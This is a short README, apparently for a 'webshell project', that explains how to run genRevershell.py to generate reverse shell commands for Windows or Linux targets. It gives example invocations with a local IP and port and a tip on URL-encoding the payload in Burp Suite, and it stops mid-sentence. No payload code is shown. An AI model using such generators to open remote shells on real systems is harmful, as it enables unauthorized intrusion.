I have made webshell project to make sure safety without evil code
File genRevershell.py
is use to generate reverse shell via cmd.
How to use:
- Use python3
- Linux OS
To gen for Windows target is :
python3 genRevershell.py 192.168.1.6 1234 1
To gen for Linux target is :
python3 genRevershell.py 192.168.1.6 1234 2
In real case, we need to encode payload as URL(Ctrl+U
in Burpsuite):